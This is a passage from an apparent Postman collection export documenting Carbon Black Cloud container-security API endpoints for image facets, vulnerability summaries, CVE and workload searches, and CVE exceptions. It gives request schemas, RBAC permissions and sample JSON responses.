queries.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"terms\": {\n        \"fields\": [\n            \"&lt;string&gt;\"\n        ]\n    },\n    \"criteria\": {\n        \"workloads\": [\n            {\n                \"cluster\": \"&lt;string&gt;\",\n                \"kind\": \"&lt;string&gt;\",\n                \"name\": \"&lt;string&gt;\",\n                \"namespace\": \"&lt;string&gt;\"\n            }\n        ],\n        \"vulnerabilities\": [\n            \"&lt;string&gt;\"\n        ],\n        \"fixes\": [\n            \"&lt;string&gt;\"\n        ],\n        \"scan_status\": [\n            \"&lt;string&gt;\"\n        ],\n        \"clusters\": [\n            \"&lt;string&gt;\"\n        ],\n        \"namespaces\": [\n            \"&lt;string&gt;\",\n            \"&lt;string&gt;\"\n        ],\n        \"cves\": [\n            {\n                \"cve\": \"&lt;string&gt;\",\n                \"package\": \"&lt;string&gt;\",\n                \"type\": \"&lt;string&gt;\"\n            }\n        ],\n        \"registries\": [\n            \"&lt;string&gt;\"\n        ],\n        \"repositories\": [\n            \"&lt;string&gt;\"\n        ],\n        \"is_running\": &lt;boolean&gt;\n    }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","images","_facet"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"45b47eb0-1939-4e8a-aa93-5f7aadad48dc","name":"Image Facets","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"query\": \"\",\n    \"criteria\": {\n        \"is_running\": true\n    },\n    \"terms\": {\n        \"fields\": [\n            \"scan_status\",\n            \"reputations\",\n            \"vulnerabilities\",\n            \"fixes\",\n            \"namespaces\",\n            \"clusters\",\n            \"repositories\"\n        ],\n        \"rows\": 50\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/images/_facet"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 04:21:08 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"1003"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"544e9f95-ffda-45f4-8220-c2370c04ba3c"}],"cookie":[],"responseTime":null,"body":"{\n    \"terms\": [\n        {\n            \"field\": \"scan_status\",\n            \"values\": [\n                {\n                    \"name\": \"SCANNED\",\n                    \"total\": 72\n                },\n                {\n                    \"name\": \"SCAN_FAILED\",\n                    \"total\": 1\n                },\n                {\n                    \"name\": \"NOT_SCANNED\",\n                    \"total\": 14\n                }\n            ]\n        },\n        {\n            \"field\": \"fixes\",\n            \"values\": [\n                {\n                    \"name\": \"AVAILABLE_FIXES\",\n                    \"total\": 65\n                },\n                {\n                    \"name\": \"NO_FIXES_AVAILABLE\",\n                    \"total\": 6\n                }\n            ]\n        },\n        {\n            \"field\": \"clusters\",\n            \"values\": [\n                {\n                    \"name\": \"demo:cluster-one\",\n                    \"total\": 60\n                },\n                {\n                    \"name\": \"test:testing-cluster-one\",\n                    \"total\": 36\n                }\n            ]\n        },\n        {\n            \"field\": \"namespaces\",\n            \"values\": [\n                {\n                    \"name\": \"demo-namespace\",\n                    \"total\": 14\n                },\n                {\n                    \"name\": \"testing-namespace\",\n                    \"total\": 3\n                }\n            ]\n        },\n        {\n            \"field\": \"reputations\",\n            \"values\": []\n        },\n        {\n            \"field\": \"repositories\",\n            \"values\": [\n                {\n                    \"name\": \"demoartifactory/cluster-scanner\",\n                    \"total\": 1\n                }\n            ]\n        },\n        {\n            \"field\": \"vulnerabilities\",\n            \"values\": [\n                {\n                    \"name\": \"CRITICAL\",\n                    \"total\": 53\n                },\n                {\n                    \"name\": \"HIGH\",\n                    \"total\": 58\n                },\n                {\n                    \"name\": \"MEDIUM\",\n                    \"total\": 55\n                },\n                {\n                    \"name\": \"LOW\",\n                    \"total\": 52\n                },\n                {\n                    \"name\": \"UNKNOWN\",\n                    \"total\": 12\n                },\n                {\n                    \"name\": \"NO_VULNERABILITIES\",\n                    \"total\": 3\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"3a6ceb0b-0b63-43b2-b4b0-a8418c2da2db"}],"id":"5d5c521f-808e-41ca-944f-4fefe6bda9cc","_postman_id":"5d5c521f-808e-41ca-944f-4fefe6bda9cc","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Image Scanning Vulnerabilities","item":[{"name":"Get Vulnerability Summary","id":"f6990d7b-9788-4232-a008-63ce8b0c4b21","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-AUTH-TOKEN"},{"key":"value","value":"{{apiKey}}"}]},"isInherited":false},"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerabilities/org_summary?running_in_k8s=true&is_running=false","description":"<p>Get the summary of scanned images and vulnerabilities by risk level.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"images\": &lt;integer&gt;,\n  \"vulnerabilities\": &lt;integer&gt;,\n  \"severity_summary\": {\n    \"CRITICAL\": {\n      \"images\": &lt;integer&gt;,\n      \"vulnerabilities\": &lt;integer&gt;,\n    },\n    \"HIGH\": {\n      \"images\": &lt;integer&gt;,\n      \"vulnerabilities\": &lt;integer&gt;,\n    },\n    \"MEDIUM\": {\n      \"images\": &lt;integer&gt;,\n      \"vulnerabilities\": &lt;integer&gt;,\n    },\n    \"LOW\": {\n      \"images\": &lt;integer&gt;,\n      \"vulnerabilities\": &lt;integer&gt;,\n    },\n    \"UNKNOWN\": {\n      \"images\": &lt;integer&gt;,\n      \"vulnerabilities\": &lt;integer&gt;\n    }\n  }\n}\n\n</code></pre>\n","urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","vulnerabilities","org_summary"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Only show result for deployed imagess</p>\n","type":"text/plain"},"key":"running_in_k8s","value":"true"},{"description":{"content":"<p>Only results for running images</p>\n","type":"text/plain"},"key":"is_running","value":"false"}],"variable":[{"id":"4d61c8c4-13dd-48d0-b9ae-20e25b5ed375","type":"any","value":"<string>","key":"org_key"}]}},"response":[{"id":"18223724-8913-403c-9e0c-1af501c6d620","name":"Vulnerability Summary","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerabilities/org_summary","host":["{{cb_url}}"],"path":["containers","v1beta","orgs","{{cb_org_key}}","vulnerabilities","org_summary"],"query":[{"key":"running_in_k8s","value":"false","description":"should show only result that relevant for deployed images, replaced by \"running_in_k8s\".","disabled":true},{"key":"is_running","value":"false","description":"should show only result that relevant for deployed images","disabled":true}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 19:07:29 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"171"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"b6264f80-f82f-42dc-90f8-2d63973aa959"}],"cookie":[],"responseTime":null,"body":"{\n    \"severity_summary\": {\n        \"CRITICAL\": {\n            \"vulnerabilities\": 390,\n            \"images\": 172\n        },\n        \"HIGH\": {\n            \"vulnerabilities\": 2061,\n            \"images\": 217\n        },\n        \"LOW\": {\n            \"vulnerabilities\": 4130,\n            \"images\": 174\n        },\n        \"MEDIUM\": {\n            \"vulnerabilities\": 3289,\n            \"images\": 195\n        },\n        \"UNKNOWN\": {\n            \"vulnerabilities\": 109,\n            \"images\": 60\n        }\n    },\n    \"images\": 263,\n    \"vulnerabilities\": 9979\n}"},{"id":"0f8cff30-de95-48d8-b8fe-f6efe7e56356","name":"Vulnerability Summary with query parameters","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerabilities/org_summary?running_in_k8s=false&is_running=false","host":["{{cb_url}}"],"path":["containers","v1beta","orgs","{{cb_org_key}}","vulnerabilities","org_summary"],"query":[{"key":"running_in_k8s","value":"false","description":"should show only result that relevant for deployed images, replaced by \"running_in_k8s\"."},{"key":"is_running","value":"false","description":"should show only result that relevant for deployed images"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 19:10:23 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"171"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"d5e05450-2d76-47ac-aa8c-7808c3fa9779"}],"cookie":[],"responseTime":null,"body":"{\n    \"severity_summary\": {\n        \"CRITICAL\": {\n            \"vulnerabilities\": 390,\n            \"images\": 172\n        },\n        \"HIGH\": {\n            \"vulnerabilities\": 2061,\n            \"images\": 217\n        },\n        \"LOW\": {\n            \"vulnerabilities\": 4130,\n            \"images\": 174\n        },\n        \"MEDIUM\": {\n            \"vulnerabilities\": 3289,\n            \"images\": 195\n        },\n        \"UNKNOWN\": {\n            \"vulnerabilities\": 109,\n            \"images\": 60\n        }\n    },\n    \"images\": 263,\n    \"vulnerabilities\": 9979\n}"}],"_postman_id":"f6990d7b-9788-4232-a008-63ce8b0c4b21"},{"name":"Search Vulnerabilites for CVE information","id":"289a87f5-5dd5-4a47-9d9c-fc360e9f9654","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-AUTH-TOKEN"},{"key":"value","value":"{{apiKey}}"}]},"isInherited":false},"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"workloads\": [\n            {\n                \"cluster\": \"demo:democluster\",\n                \"kind\": \"DaemonSet\",\n                \"name\": \"aws-node\",\n                \"namespace\": \"kube-system\"\n            }\n        ],\n        \"severity\": [\n            \"LOW\"\n        ],\n        \"digests\": [\n            \"sha256:1abcd23e645f6789gh228e8d5f9cea9311a12b0b7d884b9e1dc7665aad83047b\"\n        ],\n        \"is_running\": false\n    },\n    \"query\": \"\",\n    \"start\": 0,\n    \"rows\": 1,\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerabilities/_search","description":"<p>Search for vulnerabilities that meet the search criteria.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"criteria\": {\n    \"is_running\": &lt;boolean&gt;\n  },\n  \"query\": \"&lt;string&gt;\",\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    },\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"num_found\": &lt;integer&gt;,\n  \"results\": [\n    {\n      \"description\": \"&lt;string&gt;\",\n      \"link\": \"&lt;string&gt;\",\n      \"risk\": &lt;integer&gt;,\n      \"nvd_data\": {\n        \"cvss_v2\": {},\n        \"cvss_v3\": {}\n      },\n      \"image_count\": &lt;integer&gt;,\n      \"workload_count\": &lt;integer&gt;,\n      \"id\": \"&lt;string&gt;\",\n      \"package\": \"&lt;string&gt;\",\n      \"package_name\": \"&lt;string&gt;\",\n      \"package_type\": \"&lt;string&gt;\",\n      \"package_version\": \"&lt;string&gt;\",\n      \"severity\": \"&lt;string&gt;\",\n      \"fix_available\": \"&lt;string&gt;\",\n      \"cve_key\": \"&lt;string&gt;\",\n      \"is_exception\": &lt;boolean&gt;,\n      \"cvss\": {\n        \"v2\": &lt;integer&gt;,\n        \"v3\": &lt;integer&gt;\n      }\n    },\n  ]\n}\n\n</code></pre>\n","urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","vulnerabilities","_search"],"host":["{{cb_url}}"],"query":[],"variable":[{"id":"4e85c0c8-ced2-4c2b-b18e-d00a229863d3","type":"any","value":"<string>","key":"org_key"}]}},"response":[{"id":"f1b8dbd3-c30b-4d4b-be4b-cad6ab47d278","name":"Search CVEs","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"workloads\": [\n            {\n                \"cluster\": \"demo:democluster\",\n                \"kind\": \"DaemonSet\",\n                \"name\": \"aws-node\",\n                \"namespace\": \"kube-system\"\n            }\n        ],\n        \"severity\": [\n            \"LOW\"\n        ],\n        \"digests\": [\n            \"sha256:1abcd23e645f6789gh228e8d5f9cea9311a12b0b7d884b9e1dc7665aad83047b\"\n        ],\n        \"is_running\": false\n    },\n    \"query\": \"\",\n    \"start\": 0,\n    \"rows\": 1,\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerabilities/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 19:22:43 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"1114"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"49bfda1a-cbf6-443c-8720-660f41deb68e"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 204,\n    \"results\": [\n        {\n            \"id\": \"ALAS-2021-1722\",\n            \"package\": \"nspr\",\n            \"package_name\": \"nspr\",\n            \"package_type\": \"rpm\",\n            \"package_version\": \"4.21.0-1.amzn2.0.2\",\n            \"severity\": \"CRITICAL\",\n            \"fix_available\": \"4.32.0-1.amzn2\",\n            \"cve_key\": \"\",\n            \"is_exception\": false,\n            \"cvss\": {\n                \"v2\": 7.5,\n                \"v3\": 9.8\n            },\n            \"layer_digest\": \"\",\n            \"locations\": null,\n            \"description\": \"NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\\\#7, or PKCS \\\\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\",\n            \"link\": \"https://alas.aws.amazon.com/AL2/ALAS-2021-1722.html\",\n            \"risk\": 6,\n            \"nvd_data\": {\n                \"cvss_v2\": {\n                    \"access_complexity\": \"LOW\",\n                    \"access_vector\": \"NETWORK\",\n                    \"authentication\": \"NONE\",\n                    \"availability_impact\": \"PARTIAL\",\n                    \"confidentiality_impact\": \"PARTIAL\",\n                    \"integrity_impact\": \"PARTIAL\",\n                    \"vector_string\": \"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\n                    \"base_score\": 7.5,\n                    \"exploitability_score\": 10,\n                    \"impact_score\": 6.4\n                },\n                \"cvss_v3\": {\n                    \"version\": \"3.1\",\n                    \"attack_complexity\": \"LOW\",\n                    \"attack_vector\": \"NETWORK\",\n                    \"privileges_required\": \"NONE\",\n                    \"scope\": \"UNCHANGED\",\n                    \"user_interaction\": \"NONE\",\n                    \"availability_impact\": \"HIGH\",\n                    \"confidentiality_impact\": \"HIGH\",\n                    \"integrity_impact\": \"HIGH\",\n                    \"vector_string\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\n                    \"base_score\": 9.8,\n                    \"exploitability_score\": 3.9,\n                    \"impact_score\": 5.9\n                }\n            },\n            \"image_count\": 1,\n            \"workload_count\": 1,\n            \"affected_images\": [\n                {\n                    \"manifest_digest\": \"sha256:1abcd23e456f8968fb228e8d5f9cea9311a12b0b7d884b9e1dc7665aad83047b\",\n                    \"full_tag\": \"123456789876.abc.def.hijk.amazonaws.com/amazon-k8s-cni:v1.7.5-eksbuild.1\"\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"289a87f5-5dd5-4a47-9d9c-fc360e9f9654"},{"name":"Search Workloads for Vulnerabilities","id":"65e62b01-439e-4c9f-97aa-ee88c0e57329","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"cves\": [\n            {\n                \"cve\": \"ALAS-2021-1722\",\n                \"package\": \"nspr\",\n                \"type\": \"rpm\"\n            }\n        ]\n    },\n    \"query\": \"\",\n    \"start\": 0,\n    \"rows\": 20,\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/workloads/_search","description":"<p>List workloads with a specific vulnerabilities.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"criteria\": {\n        \"cves\": [\n            {\n                \"cve\": \"&lt;string&gt;\",\n                \"package\": \"&lt;string&gt;\",\n                \"type\": \"&lt;string&gt;\"\n            }\n        ],\n        \"images\": [\n            \"&lt;string&gt;\"\n        ]\n    },\n    \"query\": \"&lt;string&gt;\",\n    \"start\": 0,\n    \"rows\": 20,\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        },\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"num_found\": &lt;integer&gt;,\n  \"results\": [\n    {\n      \"policy\": {\n        \"name\": \"&lt;string&gt;\",\n        \"policy_id\": \"&lt;string&gt;\"\n      },\n      \"risk\": {\n        \"score\": &lt;float&gt;,\n        \"severity\": {}\n      },\n      \"scopes\": [\n        {\n          \"policy_name\": \"&lt;string&gt;\",\n          \"scope_id\": \"&lt;string&gt;\"\n        }\n      ],\n      \"cluster\": \"&lt;string&gt;\",\n      \"kind\": \"&lt;string&gt;\",\n      \"name\": \"&lt;string&gt;\",\n      \"namespace\": \"&lt;string&gt;\"\n    },\n    {\n      \"policy\": {\n        \"name\": \"&lt;string&gt;\",\n        \"policy_id\": \"&lt;string&gt;\"\n      },\n      \"risk\": {\n        \"score\": &lt;float&gt;,\n        \"severity\": {}\n      },\n      \"scopes\": [\n        {\n          \"policy_name\": \"&lt;string&gt;\",\n          \"scope_id\": \"&lt;string&gt;\"\n        }\n      ],\n      \"cluster\": \"&lt;string&gt;\",\n      \"kind\": \"&lt;string&gt;\",\n      \"name\": \"&lt;string&gt;\",\n      \"namespace\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","workloads","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ac554c05-21df-4b41-b462-1d7e8353f2c4","name":"Search Workloads for Vulnerabilities","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"cves\": [\n            {\n                \"cve\": \"ALAS-2021-1722\",\n                \"package\": \"nspr\",\n                \"type\": \"rpm\"\n            }\n        ]\n    },\n    \"query\": \"\",\n    \"start\": 0,\n    \"rows\": 20,\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/workloads/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 03 May 2023 00:10:25 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"509"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"da238841-e7dc-44cf-8ccf-5bc64ca661ce"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"cluster\": \"testcluster\",\n            \"container_images\": [\n                {\n                    \"full_tag\": \"fulltag/demo.container\",\n                    \"manifest_digest\": \"sha256:1234asdfrtyu876543fb228e8d5f9cea9311a12b0b7d884b9e1dc7665aad83047b\",\n                    \"registry\": \"123456789123.demo.org.host.company.com\",\n                    \"repo\": \"demo-repo\",\n                    \"repo_digests\": [\n                        \"\"\n                    ],\n                    \"tag\": \"v1.2.3-demobuild.1\"\n                }\n            ],\n            \"enforcements\": 0,\n            \"kind\": \"DaemonSet\",\n            \"name\": \"aws-node\",\n            \"namespace\": \"kube-system\",\n            \"policy\": {\n                \"name\": \"demo policy\",\n                \"policy_id\": \"1a2b3456-ce51-4569-94a1-defa909e1615\"\n            },\n            \"risk\": {\n                \"score\": 9,\n                \"severity\": \"high\"\n            },\n            \"scopes\": [\n                {\n                    \"policy_id\": \"1a2b3456-ce51-4569-94a1-defa909e1615\",\n                    \"policy_name\": \"demo policy\",\n                    \"scope_id\": \"9876543a-a607-4377-8ca3-d1020ad8fb85\",\n                    \"scope_name\": \"demo-scope\"\n                },\n            ],\n            \"violations\": 0\n        }\n    ]\n}"}],"_postman_id":"65e62b01-439e-4c9f-97aa-ee88c0e57329"},{"name":"Search Vulnerabilities Exceptions","id":"29659251-1e12-4cea-98f3-0d1e3a2e64e5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"cve\": \"CVE-2010-0834\",\n        \"package\":\"base-files\",\n        \"type\": \"deb\"\n    },\n    \"query\": \"\",\n    \"start\": 0,\n    \"rows\": 1,\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerability_exceptions/cve/_search","description":"<p>Search for CVE exceptions.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image_exception</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"criteria\": {\n     \"cve\": \"&lt;string&gt;\",\n     \"package\":\"&lt;string&gt;\",\n     \"type\": \"&lt;string&gt;\"\n    },\n  \"query\": \"&lt;string&gt;\",\n  \"start\": &lt;integer&gt;,\n  \"rows\": &lt;integer&gt;,\n  \"sort\": [\n    {\n      \"field\": \"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    },\n    {\n      \"field\": 